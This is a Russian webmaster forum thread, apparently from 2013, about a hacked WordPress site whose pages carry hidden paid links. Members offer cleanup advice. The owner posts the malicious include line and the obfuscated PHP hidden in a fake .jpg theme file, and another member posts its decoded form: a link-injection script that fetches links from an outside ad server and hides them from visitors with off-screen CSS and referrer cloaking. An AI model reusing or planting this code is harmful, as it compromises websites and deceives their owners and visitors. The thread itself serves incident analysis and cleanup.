X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Неизвестный торгует автоссылками с моего сайта
MacTep
MacTep
Topic Starter сообщение 27.8.2013, 23:18; Ответить: MacTep
Сообщение #1


Частый гость
**

Группа: User
Сообщений: 88
Регистрация: 30.6.2010
Из: Россия
Поблагодарили: 12 раз
Репутация:   0  


Здравствуйте. У меня такая проблема возникла. Кто то начал торговать ссылками через какую то автобиржу у меня на сайте. Сначала обнаружил продажные ссылки, начал копаться, обнаружил код:
<?php @include ($_SERVER['DOCUMENT_ROOT'].'/wp-content/themes/exotic-vacation/images/bg_rss3.jpg');?>
удалил его и ссылки исчезли. Подозреваю что этого мало, а данный код вызывает код биржи откуда-то. Подскажите, как мне удалить весь левый код и что сделать чтобы такое не повторилось впредь? И как узнать через какую биржу некто торгует ссылками с моего сайта?


Поблагодарили: (1)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
rjksdfhe
rjksdfhe
сообщение 27.8.2013, 23:22; Ответить: rjksdfhe
Сообщение #2


Straight arms
*******

Группа: Active User
Сообщений: 2760
Регистрация: 21.4.2009
Из: Мытищи, МО, РФ
Поблагодарили: 1111 раз
Репутация:   163  


Верни ссылки назад, посмотри на них, откуда растут ноги, удалишь потом.
В этом инклюде и прячется ответ на твой вопрос.

Иначе - жди следующего случая, и начинай с начала.

Сообщение отредактировал rjksdfhe - 27.8.2013, 23:23
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
MacTep
MacTep
Topic Starter сообщение 27.8.2013, 23:32; Ответить: MacTep
Сообщение #3


Частый гость
**

Группа: User
Сообщений: 88
Регистрация: 30.6.2010
Из: Россия
Поблагодарили: 12 раз
Репутация:   0  


А как собственно это делается - смотреть откуда ноги растут? В исходном коде так отображается автоссылка:

<style>.oo_f{position:absolute;left:-9898px;}</style> <div class=oo_f> <a href="http://www.yugregion.ru/" target="_blank">Новости Ростовской области</a></div>


Как узнать откуда у нее ноги выросли? У меня знаний нехватает, прошу подсказать

Сообщение отредактировал MacTep - 27.8.2013, 23:34
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
seowolf
seowolf
сообщение 27.8.2013, 23:41; Ответить: seowolf
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 286
Регистрация: 11.11.2012
Поблагодарили: 125 раз
Репутация:   16  


1. Смотрите все фалы движка на предмет даты последнего изменения
2. Все свежеизмененные файлы либо сканером на вирусы - либо вручную сравнивать с оригиналом и искать зловредный кусок
3. Отписать хостеру - возможно через его дыры что то залили
4. Какой движок? Ищем известные уязвимости и затыкаем - для всех популярных движков это все известно
5. Не забываем про архивацию БД и дистрибутива сайта

ну как бы очевидные вещи, но все же их забывают. А откуда ноги растут - вам ничего не даст, в пуаро играть смысл какой, вам нужно чтоб ваш сайт работал или наказать наглеца? Если последние то на всех патронов не хватит, дверь закройте плотно, без особой нужды никто ковырятся лишнего не будет, это взлом на автоматее скорее всего и шелл у вас на хосте.


--------------------
Бутик драгоценных камней. Удивительные драгоценные камни.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mmkulikov
mmkulikov
сообщение 28.8.2013, 8:59; Ответить: mmkulikov
Сообщение #5


Старожил
******

Группа: Active User
Сообщений: 2023
Регистрация: 21.9.2012
Из: СССР
Поблагодарили: 587 раз
Репутация:   68  


(MacTep @ 27.8.2013, 21:18) *
$_SERVER['DOCUMENT_ROOT'].'/wp-content/themes/exotic-vacation/images/bg_rss3.jpg'

Сбросьте в ЛС этот скрипт - разберемся.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
MorKer
MorKer
сообщение 28.8.2013, 9:19; Ответить: MorKer
Сообщение #6


Участник
***

Группа: User
Сообщений: 219
Регистрация: 5.6.2009
Поблагодарили: 165 раз
Репутация:   63  


У Вас виртуальный хостинг, или ВПС/Сервер?
Обновляйте cms, удаляйте сомнительные темы/модули/плагины, в большинстве случаев, взламывают именно через эти уязвимости. Найдите файл .htaccess и проверьте его на наличие сторонних изменений.

Что кроме bg_rss3.jpg размещено в папке: /wp-content/themes/exotic-vacation/images/ ?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
seobabai
seobabai
сообщение 28.8.2013, 14:15; Ответить: seobabai
Сообщение #7


Новичок
*

Группа: User
Сообщений: 29
Регистрация: 15.8.2013
Поблагодарили: 0 раз
Репутация:   -3  


Ограничь права на исполнение и поменяй пароли фтп и бд. Иначе так оно и будет постоянно заливаться к тебе.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
nika2012
nika2012
сообщение 28.8.2013, 14:44; Ответить: nika2012
Сообщение #8


Завсегдатай
*****

Группа: Active User
Сообщений: 810
Регистрация: 1.4.2011
Поблагодарили: 96 раз
Репутация:   14  


Как вариант, проверить с какого Ip идут ссылки и заблокировать в файле .htaccess.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
MacTep
MacTep
Topic Starter сообщение 28.8.2013, 15:24; Ответить: MacTep
Сообщение #9


Частый гость
**

Группа: User
Сообщений: 88
Регистрация: 30.6.2010
Из: Россия
Поблагодарили: 12 раз
Репутация:   0  


Такой скрипт был размещен в файле bg_rss3.jpg
<?php $mzjws = array('','s','n','c','a','u','6','i','l','b','r','v',')','$','z','t','(','4','f','g','d','_',';','o','e'); $xnhuevgv = $mzjws[3].$mzjws[10].$mzjws[24].$mzjws[4].$mzjws[15].$mzjws[24].$mzjws[21].$mzjws[18].$mzjws[5].$mzjws[2].$mzjws[3].$mzjws[15].$mzjws[7].$mzjws[23].$mzjws[2]; $injhxvd = $xnhuevgv('$v', $mzjws[24].$mzjws[11].$mzjws[4].$mzjws[8].$mzjws[16].$mzjws[19].$mzjws[14].$mzjws[7].$mzjws[2].$mzjws[18].$mzjws[8].$mzjws[4].$mzjws[15].$mzjws[24].$mzjws[16].$mzjws[9].$mzjws[4].$mzjws[1].$mzjws[24].$mzjws[6].$mzjws[17].$mzjws[21].$mzjws[20].$mzjws[24].$mzjws[3].$mzjws[23].$mzjws[20].$mzjws[24].$mzjws[16].$mzjws[13].$mzjws[11].$mzjws[12].$mzjws[12].$mzjws[12].$mzjws[22]); $injhxvd('DZfFrsVIEkQ/Z7rlhZk0KzMzezMyM1yz/fXz9imVKiHiRHVl4z/N1831mB3VP3m2VwT2v7IqlrL65z98Worfkmji4MUQAIhMRK5CRZwybljkSezXRZmCoR2/2Vg21MdWkMx+7uYt4D17YOXdNh6P9liMNki1EKUV5cGvFdFbBjfTT1aJBZmiNb7Xq1wY4cAy+gNuuaFZ
CzbvcUDXTcwwIWXpW5s492CadVtFe+RGTdjN5SIRROpoFDJzjfMtTymz7eAT+e92O9s9jB5SegyetsWx
+
VNDDz0NAghJmsmk9kkgrkGfMaCsYohgw9Bq+u2t+LYQR7yTUOvQxff6xEsixqwKq9l5cQUnfPt7n86Fc
w
KuJ9+iqLqv2tiDJBJmrdEnv/W9v05mZi63oJI3NvEsO8CMKacUq4bVzOxyMz5H6AWgKCEX4bHfXZwtftdZ3riLskxRP/T0WhhKQ4IwTGgSEke82fPt0/x8C8GTyh+KDVs/U4qPmZsgHm3b3X6IK1kFxxqVlRJu0kIEcuzEsSM6FYmpHqWZUAW7P+GH6myjnE6venmE/4SNp+P9TfJPIdkoXmWAUhMDpfg7C3VLL/UukENHO99GvV4JB84YFX4LjJ9b3uV5cJsR9WqPaNzinVH7p+UXKpeRAnSA2OcDL2C02mWRV81qAVUwoi
x04dDHGTBKAImKzCJKdqS12nW5xam7CFDPEvxWwD+LKLiztkUxiVc10Zmahyi7Uruejm6pRiqf+YaNXK
s
pirsOSlUqoVGsGkUnlai4FAS8LyomJCzFLXxNBMrcMEpErzz5bFFcnn+4dSfUEpOGCm8nDwIkEyeQMsO
Y
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
l
Bz+eK28mMun/k3FTVIJ1JcW3N9fJfaRh9W1RDweFHfYO5TYR3EcshyDS3urQirKZn9vUDWVzf5J9bDn7/4rCZzh3AMSRhzX6B+zh6q00KqVM4wFXHbYidjDvr55r15qp6E5G0oXRkgjl98SwEnvQD4kC81rf/2F2jU7gEPfsxCcI+LBxfJ2J2I8aZ3fmErLlxCZ0M1M7pfza2oA2Tcin9/i5VA+KpGftooj/8cxnk2wbyoTx+yuScJQa+nQFWanWPAK6vslP+Kn1yoqEiJE4A2vOHo0j0UBRozTgnCnzY6i/PH667/Sygd2HPmyhZ//7Ji7cmRMby1Z1rH8hIFYF0l/8NDLJyyJ2sRVMzZyvWjmeG9TxayltP/6A7K/nA/SJe4rgXNzO2DyG88a+y1DdkiE9GkJrwjPPjajvifVx6zDyOL27g6ytCmWSJBaMluaX80+i5UNLc//c2niwcNK+v3Bj7qxKQTNF3bGYLUQc8unGrkaT7P1mNOWDePdSUHUHA26nYoErOFP9+Q+ZF9jx4iFiSdD
WkLbKjC9QFYa18Wd0OoQVcDP9V1fELvIJ/tIO6UPNZDYmkzU80WfOcr7JXhkHMrXEeeX9l6K9u+f1ICtLP79/FV1gsUh98KwvmFXrkjWIzxGbANE7pEZ5UiU3eQgw8W40LFMLhr4NEBI50ZaAw+bkfW+stjOInoGXOmFU
5aYLhqkAC8o+FGnCRFDc7baILQ+G/he58M4N8q8pA5jpHuTT0fHby6J6q2xze7YttNIpA+NqHpDNsSi4Ez2VgvW17521PTxvF758z296tTahx/6EPirk+2yDU4SQUFtxeHNu7Zu/zulpvEy6VRjJ1ktFXrqN7v+862bEecEsCj4yM49Z+1cRR+KIfsREmRKcJAtgXEPGe6TyWpokX+ejl4wM
Hoa39sYWPNe14rYmIuRHjc1A9t+BNMpIdZr8G9XRcsvov+NOeKKTDESoFLTxtWl0sekzfmLJBye19oxy
M
AyuNP/ZEQtdQTbVtA77UN/YOCHumFrZGZ2HujH/hofXmBy5IaUpIF0O6dvCUfGWudg9eCt3KZV95Wg4I/A0IUZJRwBI8HLrWLY8tmTGzrTL20BBWglIyXGaSdCuXA6OKFWisqk9ym2HvkeYws0eNhQMzPVvEX396m
hLNK9mmphoXWYgQN+TIUBT/aqdCgh5iNzJlWrCco36cqnJRIXBH5ZbYNeDDe7HIOkWiLoymto43RzNCsAOZdMYJbyJDxE4OTAiJqkfY
sfrQ2U+fcYOhhwYJ3f4er2Ism2cvsXBdODEn2+rMSqPl9IK8ptoBxesWmb/Za8k/6s425rgDE2IrLASYTYNCFQnctgZCedxHji7NGoj/EqKpNQgK5o3ofkiwfTUnMoK0pwozJs2d3xdDfO1e6Rdg7M2GCqVbd7zbGj1HCPNqTUvMrQMqI9yiGToI
BIuu9mY81wp4qV6jOHxy3c9xA4MJEXfYXzJlufcCRB4z+knC6cENyev82A/wp5CNbZfgXRPSvg9HIzEwZMShWReM8VNFnqY8bP1Twjj92rupivn8y0mGgwX0tXKoLnNEzQgCCJAKBh9
zg6NJ7n1AiByGv6w8XxtHfAPAQF56psvqkoFQdcF0PScLpB8KNYFoRfI7K1L+ZGKbvBACatkOLJ+kicg
A
SxKphxHE1psHijIN7rx4CPgqOjx1o2Kg5CLNlyVEmTGrdgZQjVCg+ecp4MHkdBADtT/XiyNjIyvrjiKfOKbAeq0oCjeQP4jy+Wgo2RwGURaDt3gXG9QbABikAAEAQhMD//Pvvv//9Pw=='); ?>


В той папке были лишь рисунки к теме. Движок WP
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mmkulikov
mmkulikov
сообщение 28.8.2013, 19:15; Ответить: mmkulikov
Сообщение #10


Старожил
******

Группа: Active User
Сообщений: 2023
Регистрация: 21.9.2012
Из: СССР
Поблагодарили: 587 раз
Репутация:   68  


MacTep,
А это его раскодированный вариант 478.gif
<?php

$GLOBALS['_672463771_']=Array();  function _1571103316($i){$a=Array();return base64_decode($a[$i]);}
/*
  links-ads, Links Advert Solutions Company

  Released under the GNU General Public License

  Featured Products Listing Module

  Copyright (c) 2010 links-ads
*/

@error_reporting(0);
@ini_set('display_errors',0);
@ini_set('log_errors',0);

class ads_class{

    var $_nummer_schauen   = false;
    var $_alles_sagen       = false;
    var $_reparieren        = false;


    var $_kodierung            = 'UTF-8'; // windows-1251 UTF-8
    var $_ads_charset        = '';
    var $_fehler             = '';
    var $_host              = '';
    var $_request_uri       = '';
    var $_get_type = '';
    var $_senden_depens     = '';
    var $_ist_unser_s        = false;
    var $_sess_file         = '';
    var $_style = '';
    var $_links = array();
    var $_links_page = array();
    var $_delimiter = '';
    var $tmp = '/home/user1573/data/www/we-survive.ru/wp-content/themes/default/images/' ;  //'d:/web/temp/'  '/tmp/'   '/home/offerweb/data/mod-tmp'    '/var/www/teplodivo/data/tmp/'


    function ads_class($options = null){

        if (strlen($this->_host) == 0) {
            $this->_host = $_SERVER['HTTP_HOST'];
        }

        $this->_host = preg_replace('/^http:\/\//', '', $this->_host);
        $this->_host = preg_replace('/^www\./', '', $this->_host);
        $this->_request_uri = $_SERVER['REQUEST_URI'];

        if (isset($options['_kodierung']) && strlen($options['_kodierung'])) {
            $this->_kodierung = $options['_kodierung'];
        }
        if (isset($options['tmp']) && strlen($options['tmp']) != 0) {
            $this->tmp = $options['tmp'];
        }
        foreach ($_COOKIE as $key => $value){
            if (strpos($key, "e_cookie") !== false){
                $this->_ist_unser_s = true;
            }
        }
        $this->load_data();
    }

    function fetch_remote_file($host, $path) {

        $user_agent = 'ADS';
        @ini_set('allow_url_fopen',1);
        @ini_set('default_socket_timeout',6);
        @ini_set('user_agent',$user_agent);
        if (
            $this->_get_type == 'file_get_contents'
            ||
            (
                $this->_get_type == ''
                &&
                function_exists('file_get_contents')
                &&
                ini_get('allow_url_fopen') == 1
            )
        ) {
            $this->_get_type = 'file_get_contents';
            if ($data = @file_get_contents('http://' . $host . $path)) {
                return $data;
            }

        } elseif (
            $this->_get_type == 'curl'
            ||
            (
                $this->_get_type == ''
                &&
                function_exists('curl_init')
            )
        ) {
            $this->_get_type = 'curl';
            if ($ch = @curl_init()) {

                @curl_setopt($ch, CURLOPT_URL,              'http://' . $host . $path);
                @curl_setopt($ch, CURLOPT_HEADER,           false);
                @curl_setopt($ch, CURLOPT_RETURNTRANSFER,   true);
                @curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,   6);
                @curl_setopt($ch, CURLOPT_USERAGENT,        $user_agent);

                if ($data = @curl_exec($ch)) {
                    return $data;
                }

                @curl_close($ch);
            }

        } else {
            $this->_get_type = 'socket';
            $buff = '';
            $fp = @fsockopen($host, 80, $errno, $errstr, 6);
            if ($fp) {
                @fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
                @fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
                while (!@feof($fp)) {
                    $buff .= @fgets($fp, 128);
                }
                @fclose($fp);

                $page = explode("\r\n\r\n", $buff);

                return $page[1];
            }

        }

        return $this->raise_error('Error connect to server ' . $host . $path.', type: '.$this->_get_type);
    }

    function _read($filename){

        $fp = @fopen($filename, 'rb');
        @flock($fp, LOCK_SH);
        if ($fp) {
            clearstatcache();
            $length = @filesize($filename);
            $mqr = @get_magic_quotes_runtime();
            @set_magic_quotes_runtime(0);
            if ($length) {
                $data = @fread($fp, $length);
            } else {
                $data = '';
            }
            @set_magic_quotes_runtime($mqr);
            @flock($fp, LOCK_UN);
            @fclose($fp);



            return $data;
        }

        return $this->raise_error('Error read data from: ' . $filename);
    }

    function _write($filename, $data) {

        $fp = @fopen($filename, 'ab');
        if ($fp) {
            if (flock($fp, LOCK_EX|LOCK_NB)) {
                $length = strlen($data);
                ftruncate($fp, 0);
                @fwrite($fp, $data, $length);
                @flock($fp, LOCK_UN);
                @fclose($fp);

                if (md5($this->_read($filename)) != md5($data)) {
                    @unlink($filename);
                    return $this->raise_error('Error md5 check with write to: ' . $filename);
                }
            } else {
                return false;
            }

            return true;
        }

        return $this->raise_error('Error write to: ' . $filename);
    }

    function raise_error($e) {

        $this->_fehler = 'ERROR: ' . $e;
        if ($this->_alles_sagen == true) {
            print $this->_fehler;
        }
        return false;
    }

    function load_data(){

        $this->_sess_file = $this->tmp.'sess_' . md5(".".$this->_host);
        if (!is_file($this->_sess_file)) {

            if (@touch($this->_sess_file)) {
                @chmod($this->_sess_file, 0666);
            } else {
                return $this->raise_error('No file ' . $this->_sess_file . '. Creation error.');
            }
        }

        if (!is_writable($this->_sess_file)) {
            return $this->raise_error('Error access to: ' . $this->_sess_file);
        }

        @clearstatcache();

        $data = $this->_read($this->_sess_file);
        if (
            !$this->_ist_unser_s
            &&
            (
                filemtime($this->_sess_file) < (time()-3600)
                ||
                filesize($this->_sess_file) == 0
                ||
                @unserialize($data) == false
            )
        ){
            @touch($this->_sess_file, (time() - 3600 + 600));

            $path = '/code.php?user=jfb194uw2o5ntczyexlgka6i0d73h8rp&host=' . $this->_host;
            if (strlen($this->_kodierung)) {
                $path .= '&charset=' . $this->_kodierung;
            }

            if ($data = $this->fetch_remote_file('www.links-ads.net', $path)){
                if (substr($data, 0, 12) == 'FATAL ERROR:') {
                    $this->raise_error($data);
                } else {

                    $hash = @unserialize($data);
                    if ($hash != false) {

                        $hash['__ads_charset__'] = $this->_kodierung;
                        $hash['__last_update__'] = time();
                        $hash['__multi_site__'] =  true;
                        $hash['__fetch_remote_type__'] = $this->_get_type;
                        $hash['__php_version__'] = phpversion();
                        $hash['__server_software__'] = $_SERVER['SERVER_SOFTWARE'];

                        $data_new = @serialize($hash);
                        if ($data_new) {
                            $data = $data_new;
                        }
                        $this->_write($this->_sess_file, $data);
                    }
                }
            }
        }
        $this->_senden_depens = sprintf("%c%c%c%c",115,97,112,101);
        if (strlen(session_id())){
            $session = session_name() . '=' . session_id();
            $this->_request_uri = str_replace(array('?'.$session,'&'.$session), '', $this->_request_uri);
        }
        $this->set_data(@unserialize($data));
    }

    function _ergebnisse($n = null, $offset = 0) {

        if (is_array($this->_links_page)){

            $total_page_links = count($this->_links_page);

            if (!is_numeric($n) || $n > $total_page_links){
                $n = $total_page_links;
            }
            $point = 'noindex';
            $links = array();

            for ($i = 1; $i <= $n; $i++) {
                if ($offset > 0 && $i <= $offset) {
                    array_shift($this->_links_page);
                } else {
                    $links[] = array_shift($this->_links_page);
                }
            }

            $result = join($this->_delimiter, $links);

            if (
                strlen($this->_kodierung) > 0
                &&
                strlen($this->_ads_charset) > 0
                &&
                $this->_ads_charset != $this->_kodierung
                &&
                function_exists('iconv')
            ) {
                $new_html  = @iconv($this->_ads_charset, $this->_kodierung, $result);
                if ($new_html) {
                    $result = $new_html;
                }
            }

            if ($this->_ist_unser_s){
                $result = '<'.$this->_senden_depens.'_'.$point.'>'.$result.'</'.$this->_senden_depens.'_'.$point.'>';
            }

            $ergebnisse = $result;

        } else {
            $ergebnisse = $this->_links_page;
        }
        return $ergebnisse;
    }

    function _get_style(){
        return $this->_style;
    }

    function set_data($data){
        $this->_links = $data;

        if (isset($this->_links['2100499475757573'])){
            $this->_style = $this->_links['2100499475757573'];
        }

        if (isset($this->_links['434388477388475884'])){
            $this->_delimiter = $this->_links['434388477388475884'];
        }
        if (isset($this->_links['4888848858477284'])) {
            $this->_ads_charset = $this->_links['4888848858477284'];
        } else {
            $this->_ads_charset = '';
        }
        if (@array_key_exists($this->_request_uri, $this->_links) && is_array($this->_links[$this->_request_uri])) {
            $this->_links_page = $this->_links[$this->_request_uri];
        } else {
            if (isset($this->_links['2100499267309588']) && strlen($this->_links['2100499267309588'])) {
                if ($this->_ist_unser_s || $this->_nummer_schauen){
                    $this->_links_page = $this->_links['2100499267309588'];
                }
            }
        }
    }
}

$ads = new ads_class();
$ads_r = $ads->_ergebnisse();
$style = $ads->_get_style();
if (strlen($style) == 0){$style  =  '<style>.foot_st{display:none;}</style> <div class=foot_st>';}
if (strlen($ads_r)>0){

    if (isset($_SERVER['HTTP_REFERER'])){
        if (preg_match('%http://([^/]+)/%', $_SERVER['HTTP_REFERER'], $regs)){
            $data = str_replace('www.', '', $regs[1]);
            if ((substr(md5($data), 0, 5) === 'f10cd')||(substr(md5($data), 0, 5) === '2dde1')){
                echo "$ads_r"; //exit;
            }else{
                echo "$style $ads_r</div>";
            }
        }
        else{
            echo "$style $ads_r</div>";
        }
    }
    else{
        echo "$style $ads_r</div>";
    }
}

?>


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыНе повлияет ли на позиции сайта?
Если убрать контент
12 maxg5 1300 Вчера, 21:11
автор: alexandrrr
Горячая тема (нет новых ответов) Качественный копирайт и наполнение Вашего сайта
Подходи, торопись, покупай живо...
307 DroBit 86261 Вчера, 19:03
автор: Fox
Открытая тема (нет новых ответов) Чем сжимать картинки для сайта без потери качества
1st-finstep.ru - Заработок в сети и методы продвижения сайта
12 komarik_vlad 1214 Вчера, 14:47
автор: myaltai
Открытая тема (нет новых ответов) Тренд сайта по сравнению с аналогами, новый параметр в Яндекс Вебмастере
7 0alex1 1478 Вчера, 14:03
автор: coremission
Горячая тема (нет новых ответов) Регистрация Вашего сайта (профиля,DLE сайты,подписи на форумах,постинг Тиц 10> , ПР 1>)
278 kaartes 102689 Вчера, 10:55
автор: kukla


 



RSS Текстовая версия Сейчас: 15.12.2017, 4:56
Дизайн